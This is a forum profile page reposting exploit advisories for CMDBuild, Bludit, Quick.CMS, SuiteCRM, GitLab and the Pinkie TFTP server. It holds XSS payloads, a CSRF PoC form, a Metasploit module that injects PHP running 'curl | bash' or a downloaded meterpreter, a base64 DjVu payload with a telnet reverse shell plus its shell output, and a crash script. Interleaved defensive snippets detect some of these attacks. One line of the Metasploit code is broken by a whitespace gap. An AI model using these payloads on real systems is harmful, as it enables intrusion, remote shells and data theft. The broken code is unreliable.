HireHackking

Everything posted by HireHackking

  1. # Exploit Title: CMDBuild 3.3.2 - 'Multiple' Cross Site Scripting (XSS)
# Date: 15/11/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.cmdbuild.org
# Software Link: https://www.cmdbuild.org/en/download/latest-version
# Version: CMDBuild 3.3.2
# Tested on: Linux

Summary:
Multiple stored cross-site scripting (XSS) vulnerabilities in Tecnoteca CMDBuild 3.3.1 allow remote attackers to inject arbitrary web script or HTML via a crafted SVG document. The attack vectors include Add Attachment, Add Office, and Add Employee. Almost all add sections.

Proof of concepts:

Stored XSS example:
1- Login to your Dashboard as a low privilege user
2- Click on Basic archives and Employee
3- +Add card Employee
4- Enter your XSS payload in parameters
5- On the added employee click on "Open Relation Graph"

POST /cmdbuild/services/rest/v3/classes/Employee/cards?_dc=1636978977758 HTTP/1.1
...
Cmdbuild-Actionid: class.card.new.open
Cmdbuild-Requestid: f487ca06-3678-425f-8606-c6b671145353
Cmdbuild-Clientid: WL3L4mteNCU51FxhSQVzno3K
X-Requested-With: XMLHttpRequest
Content-Length: 302
Connection: close

{"_type":"Employee","_tenant":"","Code":"\"><img src=x onerror=alert(1)>","Description":null,"Surname":"\"><img src=x onerror=alert(1)>","Name":"\"><img src=x onerror=alert(1)>","Type":null,"Qualification":null,"Level":null,"Email":null,"Office":null,"Phone":null,"Mobile":null,"Fax":null,"State":null}

------------------------------------------------------------------------

File upload XSS example:
1- Click on Basic archives
2- Click on Workplace - +Add card Workplace
3- Select the "attachments" icon - +Add attachment + image
4- Upload your SVG file with the XSS payload
5- Click on preview, then right click and open in a new tab

Request:

POST /cmdbuild/services/rest/v3/classes/Workplace/cards/271248/attachments HTTP/1.1
Cmdbuild-Actionid: class.card.attachments.open

-----------------------------269319782833689825543405205260
Content-Disposition: form-data; name="file"; filename="kiwi.svg"
Content-Type: image/svg+xml

<?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 16.0.4, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
 width="612px" height="502.174px" viewBox="0 65.326 612 502.174" enable-background="new 0 65.326 612 502.174"
 xml:space="preserve">
<ellipse fill="#C6C6C6" cx="283.5" cy="487.5" rx="259" ry="80"/>
<path id="bird" d="M210.333,65.331C104.367,66.105-12.349,150.637,1.056,276.449c4.303,40.393,18.533,63.704,52.171,79.03
 c36.307,16.544,57.022,54.556,50.406,112.954c-9.935,4.88-17.405,11.031-19.132,20.015c7.531-0.17,14.943-0.312,22.59,4.341
 c20.333,12.375,31.296,27.363,42.979,51.72c1.714,3.572,8.192,2.849,8.312-3.078c0.17-8.467-1.856-17.454-5.226-26.933
 c-2.955-8.313,3.059-7.985,6.917-6.106c6.399,3.115,16.334,9.43,30.39,13.098c5.392,1.407,5.995-3.877,5.224-6.991
 c-1.864-7.522-11.009-10.862-24.519-19.229c-4.82-2.984-0.927-9.736,5.168-8.351l20.234,2.415c3.359,0.763,4.555-6.114,0.882-7.875
 c-14.198-6.804-28.897-10.098-53.864-7.799c-11.617-29.265-29.811-61.617-15.674-81.681c12.639-17.938,31.216-20.74,39.147,43.489
 c-5.002,3.107-11.215,5.031-11.332,13.024c7.201-2.845,11.207-1.399,14.791,0c17.912,6.998,35.462,21.826,52.982,37.309
 c3.739,3.303,8.413-1.718,6.991-6.034c-2.138-6.494-8.053-10.659-14.791-20.016c-3.239-4.495,5.03-7.045,10.886-6.876
 c13.849,0.396,22.886,8.268,35.177,11.218c4.483,1.076,9.741-1.964,6.917-6.917c-3.472-6.085-13.015-9.124-19.18-13.413
 c-4.357-3.029-3.025-7.132,2.697-6.602c3.905,0.361,8.478,2.271,13.908,1.767c9.946-0.925,7.717-7.169-0.883-9.566
 c-19.036-5.304-39.891-6.311-61.665-5.225c-43.837-8.358-31.554-84.887,0-90.363c29.571-5.132,62.966-13.339,99.928-32.156
 c32.668-5.429,64.835-12.446,92.939-33.85c48.106-14.469,111.903,16.113,204.241,149.695c3.926,5.681,15.819,9.94,9.524-6.351
 c-15.893-41.125-68.176-93.328-92.13-132.085c-24.581-39.774-14.34-61.243-39.957-91.247
 c-21.326-24.978-47.502-25.803-77.339-17.365c-23.461,6.634-39.234-7.117-52.98-31.273C318.42,87.525,265.838,64.927,210.333,65.331
 z M445.731,203.01c6.12,0,11.112,4.919,11.112,11.038c0,6.119-4.994,11.111-11.112,11.111s-11.038-4.994-11.038-11.111
 C434.693,207.929,439.613,203.01,445.731,203.01z"/>
<script>alert(1)</script>
</svg>
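Added example, not part of the advisory above and not CMDBuild code: a server-side check for the SVG attachment trick. The upload is accepted on the strength of its declared image/svg+xml type; the scanner below parses the document instead and refuses anything that carries a script element, an event-handler attribute or a javascript: link, which covers both the `<script>` in the kiwi.svg above and the `onerror=` style payload used in the card fields. The two sample documents are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

# Elements that can carry script or embed foreign (HTML) content inside an SVG.
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object", "handler"}
# href values that execute or smuggle content. ElementTree has already decoded entities
# such as &#x6a;avascript: by the time we see the attribute value, so they cannot hide here.
DANGEROUS_URL = re.compile(r"^[\s\x00-\x1f]*(javascript|vbscript|data)\s*:", re.IGNORECASE)


def svg_findings(svg: bytes) -> list:
    """Return the reasons an SVG document should be rejected; an empty list means none found.

    Parsing is done with ElementTree (expat), which does not fetch the external DTD that the
    Illustrator-style header references, so no external entity gets resolved on the way.
    """
    try:
        root = ET.fromstring(svg)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]

    findings = []
    for element in root.iter():
        tag = element.tag.split("}", 1)[-1]              # drop the {namespace} prefix
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"<{tag}> element")
        for attribute, value in element.attrib.items():
            name = attribute.split("}", 1)[-1].lower()   # xlink:href and href both become "href"
            if name.startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            elif name == "href" and DANGEROUS_URL.match(value):
                findings.append(f"{name}={value!r} on <{tag}>")
    return findings


def svg_is_safe(svg: bytes) -> bool:
    return not svg_findings(svg)


# Constructed samples: a cut-down version of the advisory's trick, and a clean drawing.
MALICIOUS_SVG = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="10" height="10">
  <ellipse cx="5" cy="5" rx="4" ry="2" onclick="alert(1)"/>
  <a xlink:href="javascript:alert(1)"><text>x</text></a>
  <script>alert(1)</script>
</svg>"""

CLEAN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <ellipse fill="#C6C6C6" cx="5" cy="5" rx="4" ry="2"/>
</svg>"""

if __name__ == "__main__":
    for label, document in (("malicious", MALICIOUS_SVG), ("clean", CLEAN_SVG)):
        print(label, "->", svg_findings(document) or "no findings")
```

Rejecting the file is the cheap option; if SVG uploads must be kept, serving them with `Content-Disposition: attachment` and a `Content-Security-Policy: sandbox` header stops the preview from executing anything even when a new trick slips past the scanner.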
  2. # Exploit Title: Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)
# Date: 19/10/2021
# Exploit Author: Vasu (tamilan_mkv)
# Vendor Homepage: https://www.bludit.com
# Software Link: https://www.bludit.com/releases/bludit-3-13-1.zip
# Version: bludit-3-13-1
# Tested on: kali linux
# CVE : CVE-2021-35323

### Steps to reproduce

1. Open the login page http://localhost:800/admin/login;
2. In the username field enter ``admin"><img src=x onerror=alert(1)>`` and enter the password
3. Trigger the malicious javascript code
  3. # Exploit Title: Quick.CMS 6.7 - Cross Site Request Forgery (CSRF) to Cross-site Scripting (XSS) (Authenticated)
# Date: 21/04/2021
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://opensolution.org/
# Software Link: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip
# Version: 6.7
# Tested on: Windows 8.1, Kali Linux, Burp Suite

Steps to Reproduce:
1. First, log in to your panel
2. Then click the "Sliders" menu, then "New Slider"
3. Now intercept with Burp Suite and save a new slider
4. Then use the XSS payload </textarea><script>alert(document.domain)</script> in the sDescription value.
5. Now generate a CSRF PoC:

<!DOCTYPE html>
<html>
  <body>
    <form action="http://127.0.0.1/admin.php?p=sliders-form" method="POST">
      <input type="hidden" name="iSlider" value="">
      <input type="hidden" name="aFile" filename="">
      <input type="hidden" name="sFileNameOnServer" value="slider_2.jpg">
      <input type="hidden" name="sDescription" value="test</textarea><script>alert(document.cookie)</script>">
      <input type="hidden" name="iPosition" value="1">
      <input type="hidden" name="sOption" value="save">
      <input type="submit" value="submit">
    </form>
  </body>
</html>
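Added example, not part of the post above and not Quick.CMS code: the two controls that break the chain. The PoC form works because the slider handler accepts any POST that arrives with the admin's cookies, and the stored description is echoed into a `<textarea>` unencoded. The model handler below rejects a request without a session-bound HMAC token (constant-time compare, bounded lifetime) and HTML-encodes sDescription before rendering it. The secret, session ids and the `csrf_token` field name are assumptions for the example; the form dictionary mirrors the PoC's fields.

```python
import hashlib
import hmac
import html
import time
from typing import Optional

SECRET = b"server-side secret, rotated per installation (constructed sample)"


def issue_csrf_token(session_id: str, secret: bytes = SECRET, now: Optional[int] = None) -> str:
    """Token = <issued-at>.<HMAC-SHA256(secret, session_id | issued-at)>, bound to one session."""
    issued = str(int(time.time()) if now is None else now)
    mac = hmac.new(secret, f"{session_id}|{issued}".encode(), hashlib.sha256).hexdigest()
    return f"{issued}.{mac}"


def verify_csrf_token(token: Optional[str], session_id: str, secret: bytes = SECRET,
                      max_age: int = 3600, now: Optional[int] = None) -> bool:
    """True only for an unexpired token minted for this session; anything else is a forgery."""
    if not token or "." not in token:
        return False
    issued, mac = token.split(".", 1)
    if not issued.isdigit():
        return False
    current = int(time.time()) if now is None else now
    if not 0 <= current - int(issued) <= max_age:
        return False
    expected = hmac.new(secret, f"{session_id}|{issued}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)      # constant-time comparison


def save_slider(form: dict, session_id: str, secret: bytes = SECRET, now: Optional[int] = None) -> tuple:
    """Model of the admin.php?p=sliders-form save handler: (HTTP status, rendered description field)."""
    if not verify_csrf_token(form.get("csrf_token"), session_id, secret, now=now):
        return 403, "CSRF token missing or invalid"
    # Output encoding: the stored value can no longer close the <textarea> it is rendered into.
    description = html.escape(form.get("sDescription", ""), quote=True)
    return 200, f'<textarea name="sDescription">{description}</textarea>'


# The advisory's PoC form as the server receives it: no token, attacker-chosen description.
POC_FORM = {
    "iSlider": "",
    "sFileNameOnServer": "slider_2.jpg",
    "sDescription": "test</textarea><script>alert(document.cookie)</script>",
    "iPosition": "1",
    "sOption": "save",
}

if __name__ == "__main__":
    sid = "admin-session-1"
    print(save_slider(POC_FORM, sid))
    print(save_slider(dict(POC_FORM, csrf_token=issue_csrf_token(sid)), sid))
```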
  4. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::CmdStager
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SuiteCRM Log File Remote Code Execution',
        'Description' => %q{
          This module exploits an input validation error on the log file extension parameter.
          It does not properly validate upper/lower case characters. Once this occurs, the
          application log file will be treated as a php file. The log file can then be populated
          with php code by changing the username of a valid user, as this info is logged. The php
          code in the file can then be executed by sending an HTTP request to the log file.

          A similar issue was reported by the same researcher where a blank file extension could
          be supplied and the extension could be provided in the file name. This exploit will work
          on those versions as well, and those references are included.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'M. Cory Billington' # @_th3y
        ],
        'References' => [
          ['CVE', '2021-42840'],
          ['CVE', '2020-28328'], # First CVE
          ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue.
          ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit
          ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit
        ],
        'Platform' => %w[linux unix],
        'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86],
        'Targets' => [
          [
            'Linux (x64)',
            {
              'Arch' => ARCH_X64,
              'Platform' => 'linux',
              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' }
            }
          ],
          [
            'Linux (cmd)',
            {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix',
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
            }
          ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        },
        'Privileged' => true,
        'DisclosureDate' => '2021-04-28',
        'DefaultTarget' => 0
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']),
        OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']),
        OptString.new('PASS', [true, 'Password for administrator', 'admin']),
        OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]),
        OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),
        OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])
      ]
    )
  end

  def check
    authenticate unless @authenticated
    return Exploit::CheckCode::Unknown unless @authenticated

    version_check_request = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri.path, 'index.php'),
        'keep_cookies' => true,
        'vars_get' => {
          'module' => 'Home',
          'action' => 'About'
        }
      }
    )
    return Exploit::CheckCode::Unknown("#{peer} - Connection timed out") unless version_check_request

    # Extended-mode regex: the comments must stay on their own lines or they swallow the pattern.
    version_match = version_check_request.body[/
      Version
      \s
      \d{1}     # Major revision
      \.
      \d{1,2}   # Minor revision
      \.
      \d{1,2}   # Bug fix release
    /x]
    version = version_match&.partition(' ')&.last
    if version.nil? || version.empty?
      about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About"
      return Exploit::CheckCode::Unknown("Check #{about_url} to confirm version.")
    end

    patched_version = Rex::Version.new('7.11.18')
    current_version = Rex::Version.new(version)
    return Exploit::CheckCode::App
                                                                                                                                                                                   
ears("SuiteCRM #{version}") if current_version <= patched_version

    Exploit::CheckCode::Safe("SuiteCRM #{version}")
  end

  def authenticate
    print_status("Authenticating as #{datastore['USER']}")
    initial_req = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri, 'index.php'),
        'keep_cookies' => true,
        'vars_get' => {
          'module' => 'Users',
          'action' => 'Login'
        }
      }
    )
    return false unless initial_req && initial_req.code == 200

    login = send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri, 'index.php'),
        'keep_cookies' => true,
        'vars_post' => {
          'module' => 'Users',
          'action' => 'Authenticate',
          'return_module' => 'Users',
          'return_action' => 'Login',
          'user_name' => datastore['USER'],
          'username_password' => datastore['PASS'],
          'Login' => 'Log In'
        }
      }
    )
    return false unless login && login.code == 302

    res = send_request_cgi(
      {
        'method' => 'GET',
        'uri' => normalize_uri(target_uri, 'index.php'),
        'keep_cookies' => true,
        'vars_get' => {
          'module' => 'Administration',
          'action' => 'index'
        }
      }
    )
    auth_succeeded?(res)
  end

  def auth_succeeded?(res)
    return false unless res

    if res.code == 200
      print_good("Authenticated as: #{datastore['USER']}")
      if res.body.include?('Unauthorized access to administration.')
        print_warning("#{datastore['USER']} does not have administrative rights! Exploit will fail.")
        @is_admin = false
      else
        print_good("#{datastore['USER']} has administrative rights.")
        @is_admin = true
      end
      @authenticated = true
      return true
    else
      print_error("Failed to authenticate as: #{datastore['USER']}")
      return false
    end
  end

  def post_log_file(data)
    send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(target_uri, 'index.php'),
        'ctype' => "multipart/form-data; boundary=#{data.bound}",
        'keep_cookies' => true,
        'headers' => {
          'Referer' => "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView"
        },
        'data' => data.to_s
      }
    )
  end

  def modify_system_settings_file
    filename = rand_text_alphanumeric(8).to_s
    extension = '.pHp' # mixed case slips past the case-sensitive extension check
    @php_fname = filename + extension
    action = 'Modify system settings file'
    print_status("Trying - #{action}")
    data = Rex::MIME::Message.new
    data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
    data.add_part('Configurator', nil, nil, 'form-data; name="module"')
    data.add_part(filename.to_s, nil, nil, 'form-data; name="logger_file_name"')
    data.add_part(extension.to_s, nil, nil, 'form-data; name="logger_file_ext"')
    data.add_part('info', nil, nil, 'form-data; name="logger_level"')
    data.add_part('Save', nil, nil, 'form-data; name="save"')
    res = post_log_file(data)
    check_logfile_request(res, action)
  end

  def poison_log_file
    action = 'Poison log file'
    if target.arch.first == 'cmd'
      command_injection = "<?php `curl #{@download_url} | bash`; ?>"
    else
      @meterpreter_fname = "#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}"
      command_injection = %(
        <?php `curl #{@download_url} -o #{@meterpreter_fname}; /bin/chmod 700 #{@meterpreter_fname}; /bin/sh -c #{@meterpreter_fname};`; ?>
      )
    end
    print_status("Trying - #{action}")
    # The last name is logged verbatim, which is what carries the PHP into the log file.
    data = Rex::MIME::Message.new
    data.add_part('Users', nil, nil, 'form-data; name="module"')
    data.add_part('1', nil, nil, 'form-data; name="record"')
    data.add_part('Save', nil, nil, 'form-data; name="action"')
    data.add_part('EditView', nil, nil, 'form-data; name="page"')
    data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')
    data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
    data.add_part(command_injection, nil, nil, 'form-data; name="last_name"')
    res = post_log_file(data)
    check_logfile_request(res, action)
  end

  def restore
    action = 'Restore logging to default configuration'
    print_status("Trying - #{action}")
    data = Rex::MIME::Message.new
    data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
    data.add_part('Configurator', nil, nil, 'form-data; name="module"')
    data.add_part('suitecrm', nil, nil, 'form-data; name="logger_file_name"')
    data.add_part('.log', nil, nil, 'form-data; name="logger_file_ext"')
    data.add_part('fatal', nil, nil, 'form-data; name="logger_level"')
    data.add_part('Save', nil, nil, 'form-data; name="save"')
    post_log_file(data)

    data = Rex::MIME::Message.new
    data.add_part('Users', nil, nil, 'form-data; name="module"')
    data.add_part('1', nil, nil, 'form-data; name="record"')
    data.add_part('Save', nil, nil, 'form-data; name="action"')
    data.add_part('EditView', nil, nil, 'form-data; name="page"')
    data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')
    data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
    data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name="last_name"')
    res = post_log_file(data)
    unless res && res.code == 301
      print_error("Failed - #{action}")
      return
    end
    print_good("Succeeded - #{action}")
  end

  def check_logfile_request(res, action)
    fail_with(Failure::Unknown, "#{action} - no reply") unless res

    unless res.code == 301
      print_error("Failed - #{action}")
      fail_with(Failure::UnexpectedReply, "Failed - #{action}")
    end
    print_good("Succeeded - #{action}")
  end

  def execute_php
    print_status("Executing php code in log file: #{@php_fname}")
    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri, @php_fname),
        'keep_cookies' => true
      }
    )
    fail_with(Failure::NotFound, "#{peer} - Not found: #{@php_fname}") if res && res.code == 404

    register_files_for_cleanup(@php_fname)
    register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty?
  end

  def on_request_uri(cli, _request)
    send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
    print_good("#{peer} - Payload sent!")
  end

  def start_http_server
    start_service(
      {
        'Uri' => {
          'Proc' => proc do |cli, req|
            on_request_uri(cli, req)
          end,
          'Path' => resource_uri
        }
      }
    )
    @download_url = get_uri
  end

  def exploit
    start_http_server
    authenticate unless @authenticated
    fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated
    fail_with(Failure::NoAccess, "#{datastore['USER']} does not have administrative rights!") unless @is_admin

    modify_system_settings_file
    poison_log_file
    execute_php
  ensure
    restore if datastore['RESTORECONF']
  end
end
  5. # Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)
# Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22
# Date: 11/01/2021
# Exploit Author: Jacob Baines
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://gitlab.com/gitlab-org/gitlab
# Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8
# Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)
# CVE : CVE-2021-22205
# Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/
# Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed

Code execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it.

1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270.

echo -e "QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs=" | base64 -d > lol.jpg
echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg
echo -n "fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg==" | base64 -d >> lol.jpg

2. Sending the payload. Any random endpoint will do.

curl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8)

2a. Sample output from the reverse shell:

$ nc -lnvp 1270
Listening on [0.0.0.0] (family 0, port 1270)
Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport 34836)
whoami
git
id
uid=998(git) gid=998(git) groups=998(git)
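Added example, not part of the post above and not GitLab or ExifTool code: a pre-ExifTool check for the kind of file the advisory sends. The decoded payload starts with the DjVu container magic `AT&TFORM` although it is named lol.jpg, and its uncompressed `ANTa` annotation chunk contains a `qx{...}` Perl call that the vulnerable DjVu parser interpolated. The function below flags both the extension/magic mismatch and the Perl construct; the `DJVU_SAMPLE` bytes are constructed in the same shape as the advisory's payload, not copied from it, and a `JPEG_SAMPLE` is included for contrast. The set of Perl tokens is an assumption of this example.

```python
import re

DJVU_MAGIC = b"AT&TFORM"
# What the file claims to be, by extension, versus the bytes it must start with.
IMAGE_MAGICS = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Perl constructs that the vulnerable DjVu annotation parser ended up evaluating (CVE-2021-22204).
PERL_EXEC = re.compile(rb"qx\{|`|\bsystem\s*\(|\bexec\s*\(|\beval\s*[({]")


def check_image_upload(filename: str, data: bytes) -> list:
    """Return reasons to refuse the file; an empty list means nothing suspicious was found."""
    findings = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    expected = IMAGE_MAGICS.get(ext)
    if expected and not data.startswith(expected):
        findings.append(f"content does not match .{ext} magic")
    if data.startswith(DJVU_MAGIC):
        findings.append("DjVu container (AT&TFORM)")
        # Uncompressed annotation chunk; a BZZ-compressed ANTz chunk would need decompressing first.
        anta = data.find(b"ANTa")
        if anta != -1 and PERL_EXEC.search(data[anta:]):
            findings.append("Perl code inside DjVu annotation chunk")
    return findings


# Constructed sample in the shape of the advisory's lol.jpg: DjVu container, .jpg name, and an
# annotation whose Copyright string breaks out of its quotes into a Perl qx{} call.
DJVU_SAMPLE = (
    DJVU_MAGIC + b"\x00\x00\x00\x48" + b"DJVIANTa" + b"\x00\x00\x00\x38"
    + b'(metadata\n\t(Copyright "\\\n" . qx{id} . \\\n" b "))'
)
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00\xff\xd9"

if __name__ == "__main__":
    print("lol.jpg:", check_image_upload("lol.jpg", DJVU_SAMPLE))
    print("photo.jpg:", check_image_upload("photo.jpg", JPEG_SAMPLE))
```

Magic-byte sniffing is the durable part of this check: the fix for the GitLab side of the bug was to stop handing arbitrary uploads to ExifTool, and a server that only passes files whose content matches a short allowlist of image types never reaches the DjVu code path at all.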
  6. # Exploit Title: Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-11-19
# Vendor Homepage: http://www.ipuptime.net/
# Software Link : http://ipuptime.net/PinkieSetup.zip
# Tested Version: 2.15
# Vulnerability Type: Buffer Overflow (DoS) Remote
# Tested on OS: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64
# Description: Pinkie 2.15 TFTP Remote Buffer Overflow

# Steps to reproduce:
# 1. - Download and install Pinkie 2.15
# 2. - Start TFTP Server listening on port 69
# 3. - Run the Script from remote PC/IP
# 4. - Crashed

#!/usr/bin/env python3
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

# RFC 1350 read request: opcode, filename, NUL, mode, NUL. The filename field is the
# 32768-byte mutant; the comments have to stay on their own lines so the '+' survives.
read = (
    # Request - read
    b'\x00\x01'            # Static - opcode
    + b')' * 32768 +       # String - source_file (mutant, size=32768, orig val: b'File.bin')
    b'\x00'                # Delim - delim1
    b'netascii'            # String - transfer_mode
    b'\x00'                # Delim - delim2
)

sock.sendto(read, ('192.168.1.207', 69))
sock.recv(65535)
sock.close()
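Added example, not part of the post above and not Pinkie code: the request format the PoC mutates, built and then parsed the way a TFTP server should parse it. RFC 1350 sets no upper bound on the filename, which is exactly what the 32768-byte field exploits; the parser below enforces its own bound (the 255-byte limit is this example's choice), requires both NUL terminators and accepts only the three defined modes. The two datagrams are constructed here: the benign `File.bin` request and the PoC's oversized one.

```python
import struct

OP_RRQ, OP_WRQ = 1, 2
VALID_MODES = (b"netascii", b"octet", b"mail")
# RFC 1350 puts no upper bound on the filename; this limit is this example's server-side choice.
MAX_FILENAME = 255


class TftpRequestError(ValueError):
    pass


def build_request(opcode: int, filename: bytes, mode: bytes = b"netascii") -> bytes:
    """RRQ/WRQ wire format: 2-byte big-endian opcode, filename, NUL, mode, NUL."""
    return struct.pack("!H", opcode) + filename + b"\x00" + mode + b"\x00"


def parse_request(datagram: bytes, max_filename: int = MAX_FILENAME) -> tuple:
    """Parse an RRQ/WRQ defensively: bounded filename, NUL-terminated fields, known mode."""
    if len(datagram) < 4:
        raise TftpRequestError("datagram too short for a request")
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in (OP_RRQ, OP_WRQ):
        raise TftpRequestError(f"unexpected opcode {opcode}")
    fields = datagram[2:].split(b"\x00")
    if len(fields) < 3:                  # filename, mode, and the remainder after the final NUL
        raise TftpRequestError("filename or mode not NUL-terminated")
    filename, mode = fields[0], fields[1]
    if not 1 <= len(filename) <= max_filename:
        raise TftpRequestError(f"filename length {len(filename)} outside 1..{max_filename}")
    if mode.lower() not in VALID_MODES:  # mode is case-insensitive per the RFC
        raise TftpRequestError(f"unknown transfer mode {mode!r}")
    return opcode, filename.decode("ascii", "replace"), mode.decode("ascii").lower()


def request_is_acceptable(datagram: bytes) -> bool:
    try:
        parse_request(datagram)
        return True
    except TftpRequestError:
        return False


# Constructed datagrams: the benign request the PoC mutated, and the PoC's oversized one.
NORMAL_RRQ = build_request(OP_RRQ, b"File.bin")
CRASH_RRQ = build_request(OP_RRQ, b")" * 32768)

if __name__ == "__main__":
    print(parse_request(NORMAL_RRQ))
    try:
        parse_request(CRASH_RRQ)
    except TftpRequestError as exc:
        print("rejected:", exc)
```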
  7. # Exploit Title: Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload
# Google Dork: inurl: /wp-content/plugins/smart-product-review/
